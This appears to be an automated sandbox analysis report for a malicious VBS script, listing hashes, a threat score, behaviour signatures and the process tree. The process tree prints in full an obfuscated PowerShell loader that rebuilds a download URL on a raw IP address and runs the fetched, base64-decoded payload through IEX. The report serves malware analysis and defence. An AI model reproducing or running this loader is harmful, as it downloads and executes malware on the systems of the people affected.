Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
02-12-2024 16:25
General
-
Target
1618780b8570f9b44fdd73513c6aa8069eb8a9151a22d83b178c5be6eb125013.vbs
-
Size
96KB
-
MD5
456272f4cfecc56e5c7856bfba2bb77f
-
SHA1
10b3f7f01cfc05b05910110c93eed15bc294444a
-
SHA256
1618780b8570f9b44fdd73513c6aa8069eb8a9151a22d83b178c5be6eb125013
-
SHA512
3aedfbf46d5247c16fda370514d4b847099e89e5cd3695ba947667a7efaf53da217203444a8089f998836770556a79bd2e8b7b4197178bbe5a228c0f3a0b627c
-
SSDEEP
3072:7pAqCwlpbjrHFYWBxHEQdcpiE07Q/gsUo1wni3:KJw/bjZPbkPpL00/gsUEf
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Network Service Discovery 1 TTPs 1 IoCs
Attempt to gather information on host's network.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1618780b8570f9b44fdd73513c6aa8069eb8a9151a22d83b178c5be6eb125013.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Dulses Generalforsamlingsdato Lovlighedens Labbernes #>;$Spond='Fjeldmarkens';<#Overspringende Handelsomstning Snestorms #>;$Krlighedsforholdenes=$host.PrivateData;If ($Krlighedsforholdenes) {$Psykoteknisk++;}function Unabused($Redaktrer){$Fjerbuskenes=$Skibsjournalen+$Redaktrer.Length-$Psykoteknisk;for( $Communalizer=4;$Communalizer -lt $Fjerbuskenes;$Communalizer+=5){$Pomposities='Zapped';$Roskildenseres+=$Redaktrer[$Communalizer];}$Roskildenseres;}function Associationsteknikkerne($Snnekonernes){ & ($Selektionsmekanismerne) ($Snnekonernes);}$Winnie=Unabused 'SterMSar oU.giz Kori.yall Isfl mu a,lac/ Me,5 Ul..navi0B.id Iden(Ka,kWSpiliTremnK okdUndeoCeruwOrgasAnt OutbN SulTUdfo Tria1Kjor0Brdr.Pren0Tr n;Sha, MiljWHjeriKrognSucc6Depr4.res;Pa a Lnpoxs lv6 Men4 Ro ; Syn reperKompvDemi:dolo1Lgeh2Inco1 le.Hand0prop)Me u RaaGarseekrybcScark T tofin./Chik2Fela0Infe1Farv0Infl0 Tai1 Non0Unki1 Cli G.atF Kdsi C lrTru eSundf Le o CamxChry/Aren1Haan2 A k1 kan. Vov0 Pan ';$Troskabens=Unabused ' FruuN,beSMigrEkr grOkay-For A.endg AtoEFlo.NSforTVigt ';$Dyttet=Unabused ' dechBombtUdsttImbepOpeg:Indb/Omde/Isce9Ingo1Avl..Kn p1Spur0 P i9 Pau.Mase2Akt 0Para.Sma.1Bone6Tant1 ,hr/S.raU NomnInsudThrieFnokr Annkscoll LogaKautsKosysSocieUnderEften AleeR te.Abe pMos fA limCyan ';$Manorialize=Unabused 'Poly> kil ';$Selektionsmekanismerne=Unabused 'blueIThe,e earX Fre ';$Endossementet='Waring';$Retorikken='\Udenlandsopholdenes.Fin';Associationsteknikkerne (Unabused ' Vid$Sid gStralBlitoVelvb Fo a Legl Gra: Sk SKo eyDropnuhard Sygi Silku sleKrakruntaeUndfdStowe rgu1Besp1 St,2 Ork= F n$DaimeBegnnTubevFree: Cona Attp earp F sdJubia iltNon,aUnb +Stv.$ FavRP eteEr ot vero ,ear He iTejskUdtykCon e AronOmve ');Associationsteknikkerne (Unabused ' Kol$FondgU smlFemio Vilbp wta.nrilGros:OfteUMai m hefbQuarr KulaGoyae Homn Kiwsse v= P.t$ LatD urnyAuret T,at RineBu.atjern.Forks PolpUdfolDogmiS bct Hyp( Bio$con.MMauha rrn agsoudglrkey,iTrizaStkklJahniBatiz CreePost)synt ');Associationsteknikkerne (Unabused 'Disp[BaldNRejoeTribtExce. Ga.SSu deKn gr edrvInteiStavc GeoeAntiPHalvo umi Ir,nDyppt uteMPap.a MjdnAsm aFootgIndueMedurZabi]Apic: Car:GevaSlan e dilcAl bu PrirMisai Mekt RecySociPKno,r ,ono IketInfeo PercOpteophotlKick Elvr=nove Tmni[HkerNUdspeFanetBevr.BemrSCompeInfrc Lepu D rrRenci ,latTeleyPr,ePElevrEcoro Frat B doSkr,cs naoTreslSamsTGo.syConvpCypreHopp]Bira:tara:MennTBestl Evas Spn1 Ben2 ung ');$Dyttet=$Umbraens[0];$Nonexperimental=(Unabused 'H dr$TeskgnubiLTi bosupebPuttABru lSkna:Vieri dygNLivrD empsAn iMSp dUHogbgArvelTangiRei nT.keGDrkaeAl.iR ntrNRumse,ants,and2Grn 0 For0Conv=InddnDopiEOf ewHete-Grano .olbFl cJDrifEM ssCBarbtCo g BoxsNeueYDataSfristqu deLue m it.CharnJaileUnslt rbe.OpstWCarnEG,vib StvcUnbrLTe nirag EUrtiNHymetOver ');Associationsteknikkerne ($Nonexperimental);Associationsteknikkerne (Unabused ' Byg$G.stI Forn,eskd D rsVis mRytmuHjrngcivilCuckiOu.inRegngZoneetrear QuinEstueProbs ese2Nobb0Wark0 .oi.StavH Sh eIcklaT audAdvieFjerrOutssPige[Syns$LngeTStrirChrooVar.sKurskM era Tr bOp,keRejunDia sGril]re u=,ent$Pan.WLongi rren VirnhreliB taeI de ');$Tegnfejls=Unabused 'Zeph$ AntICompnA end AnosPinamEngluRigsgPleulPs ui ehnAmatgTriceRed rEnten ReseCosssAffa2 Inf0Krum0Paa,. Ud DSteno A twBlnkn Pa l Hjuo SmaaEm.nd GjoFHy.ric tclSulpePull(Fo,m$ SunDdeprySovjt Ru.t A.seAfgit Opl, Sti$KoncM Im emacrtSkataKrbbsforgtSla a orpsUnsciUnduz Rr,eSluksSanh)Co,p ';$Metastasizes=$Syndikerede112;Associationsteknikkerne (Unabused 'Tyks$TampG Ly.lM rgO TilBbeleaRuptL xte:L ppsDanmYI dgN Hydo ,orNInstYO.semJyd ibirikP ed= ork(Ambot RifeDidrsplanTflu -TherPOm nAStertWcerhCurc Ampu$TurmmKalkEOrchTPersaPr,lsSy dtAlp.Ate es HviIUdbeZstateStvlspena)Zeph ');while (!$Synonymik) {Associationsteknikkerne (Unabused ' Dru$ Afkg AntlPedaoRe,pb TilaOve lTran:StueMLavtaTongdUnfrbNet rForsa dekiFeu nBevi=Over$ KoatLat rSti uElv eSupe ') ;Associationsteknikkerne $Tegnfejls;Associationsteknikkerne (Unabused 'WeddS UnptUns,aChicrArbetPote-AethS Budl .okePr feHoolplov, Hav4U,vi ');Associationsteknikkerne (Unabused 'Onde$SupegFr.tlFl soAnsgbRaafaForfl A s:LuksSAdheyOr anLeveoSourn Eg y,dfam Fori FrikA be=Exte(TegnTUdfoeGasssFredtHedy-A odP Re.ahypst Oveh Br Genn$ ruMFe teEndetUdtaaUnc s ud tMo ea rips,seui onszBeste,ndesEnri)Bres ') ;Associationsteknikkerne (Unabused 'Epis$drilgDommlMureoAposbRabuaFdevlrach:InspGAmbroG thrFiskb,nmoeLadytMiti= udv$Gbakg na.lOk aoDiffbS.lia Konl ari:HerrETenatC.ltaGalaaDjvlr Ge sdiskfHy.gdpacssPipeeKlovlPoets Ch.dT icaPseugUstee Pa nMidte oossBldh+ Cli+Frih%Ha j$Fo pU,ithmVan.bForar Q,aa brieTeatnEly,sClem.Paryc stao F luFer nOve,t Fib ') ;$Dyttet=$Umbraens[$Gorbet];}$Retsbeskyttelsesperioden54=286648;$Sprngbombes=29720;Associationsteknikkerne (Unabused 'Be,r$Confg.illlmyopoapotb mpaJohalPunc: nevC.ussobioesMargeBlodi,nknsRigtmProsaForklFors D mk= agl TilsGSp defugutUdhu- ResCDangoSimunmlket BoseTrann UnutGotf Sorb$ RotMC emePalmt SkraReces LumtOpioaPalas UniiUncazMinie F.rsReno ');Associationsteknikkerne (Unabused ' Squ$Hretg C.llhjlaoNonibKiauaFi hl orc:St iAGhe,cPr lcSm du ,onrMoulsEcrae SandGavinPathe,aves SemsStuk2 Ret0Assi3Udan Taa=Bic, No a[ fteSLu by H rs Sstt isteho dm Mis.RaceComlao ButnHuswv awe Os r.oritOkeh] Afs:Exoa:In,eFBioprHydro OvemdrmeBPro a lacsStreeAbor6Ho.o4PaleSD,rmtNaturSus iSpi nNa bg ,ha(Fyrv$PrayC ondoSkygs rinePartiss es BromSkedaRes llamm)Unti ');Associationsteknikkerne (Unabused 'Labi$fab gGin lDrosoForsbSteraUnstlPret:CounG iscySloinVel oOversQuinpBeskoEdgirInteaEuphnProjg triIganuUdlsm Tek Med,=Syne ghet[Fou SOpenyLbn,s Funt GeneT knmdros.statTVeraeFilmxVelvtKokk.IncuE MinnBirkc Smeo SigdToneiVisnn .elgMele]Dark:Skim: onAExprSLnfoCCentIJe cIUdho. AtrGRhabe Nset .enStuattSou.rVotiiMuttnDobbgSlum(A pe$udvaAA,sucUnuscOveru CykrSupesforseBr vdThe nSammeSvensH drsScan2Sona0 .op3Tord)Brst ');Associationsteknikkerne (Unabused 'Fobi$StabgchaulPentoForebPro,aSm rlKa a:LndeKClicr UopiGstesSto tOvereSn rlA tiiMi.agTe rtLaug=Adip$tolnG B gy Agtn.ensoSekss ,unpSersomellrTandaHindn HregpantiUninuDeclm dvi.Plurs,emyuSlotbBonhsTarntPal.rSporiForhnAcq gFobi(Fest$ BriRMidseEnnot Caps Un bAfskeP rusNed k Undy omt Kejt pareTwisl TvisD rfeTufasKo,gpFlo eMo,lrKonfi.edeoLethdGe teAnsln P o5Di.p4Unwr, O t$Par SS ilp arvrL.denSoongAbekbTopeoDannmElevbLykeeJo,nsSeer)U de ');Associationsteknikkerne $Kristeligt;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
9.6MB